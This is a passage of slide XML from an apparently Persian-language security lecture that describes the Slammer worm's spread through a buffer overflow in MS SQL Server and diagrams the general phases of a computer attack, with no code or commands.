              <a:t>Then you have about 6 - 8 months to write your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit code…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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16</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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68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4"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74638"/>
            <a:ext cx="8229600" cy="796925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>کرم </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Slammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t> نمونه اي از بهره برداري از سرريز بافر</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>اولين مثال از يک کرم سريع ( تا پيش از اين، اين سرعت انتشار فقط در تئوري بود )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>در عرض 30 دقيقه، 75000 هاست آلوده شد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>90%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> از اين هاست ها در عرض 10 دقيقه اول انتشار آلوده شدند</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>آسيب پذيري در </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> بود!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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74638"/>
            <a:ext cx="8229600" cy="796925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>کرم </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Slammer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>نمونه اي از بهره برداري از سرريز بافر</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651"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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>کد به صورت تصادفي يک آدرس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> توليد ميکرد و يک کپي از خود را به آن ارسال ميکرد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> استفاده ميکرد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>اندازه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> هاي اين کرم فقط 375</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t> بايت بود</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0"/>
              <a:t>انتشار اين کرم هر 8.5 ثانيه دوبرابر مي شد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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28600" y="304800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>کرم </a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Slammer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E23DAE57-2540-475B-BF56-2BCC7192F744}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 4" descr="S:\csci8980\project\sql-before.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1752600"/>
            <a:ext cx="8305800" cy="4672013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="104775" y="4133850"/>
            <a:ext cx="1222375" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شناسايي سيستم </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347153" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="417046"/>
            <a:ext cx="6827838" cy="523220"/>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ar-SA" altLang="en-US"/>
              <a:t>روند نماي کلي انجام يک حملة کامپيوتري </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="292100" y="1276350"/>
            <a:ext cx="7997825" cy="5105400"/>
            <a:chOff x="184" y="864"/>
            <a:chExt cx="5038" cy="3216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347148" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="184" y="938"/>
              <a:ext cx="672" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="A50021"/>
                  </a:solidFill>
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>شناسايي مواضع و نقاط ضعف سيستم هدف</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347149" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1296" y="960"/>
              <a:ext cx="1000" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="A50021"/>
                  </a:solidFill>
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>هجوم اوليه</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347150" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2856" y="912"/>
              <a:ext cx="1000" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="A50021"/>
                  </a:solidFill>
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>تثبيت مواضع</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347151" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4224" y="864"/>
              <a:ext cx="998" cy="360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ar-SA" sz="1400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="A50021"/>
                  </a:solidFill>
                  <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>برنامه ريزي مرحله بعد عمليات</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347154" name="Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4272" y="1056"/>
              <a:ext cx="0" cy="3024"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="dashDot"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347155" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2509" y="1056"/>
              <a:ext cx="0" cy="3024"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="dashDot"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347156" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="956" y="1056"/>
              <a:ext cx="0" cy="3024"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="dashDot"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347139" name="Oval 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1727200" y="5541963"/>
            <a:ext cx="777875" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تخريب</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347143" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2768600" y="5472113"/>
            <a:ext cx="885825" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" tIns="54000" rIns="54000" bIns="54000" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1400" b="1">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>جلوگيري از سرويس</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347157" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7200000" flipV="1">
            <a:off x="1260475" y="4435475"/>
            <a:ext cx="730250" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="sq">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347158" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18000000">
            <a:off x="1039576" y="3817397"/>
            <a:ext cx="1209860" cy="79050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="sq">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347159" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7200000" flipH="1" flipV="1">
            <a:off x="2568575" y="5654675"/>
            <a:ext cx="134938" cy="231775"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="sq">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
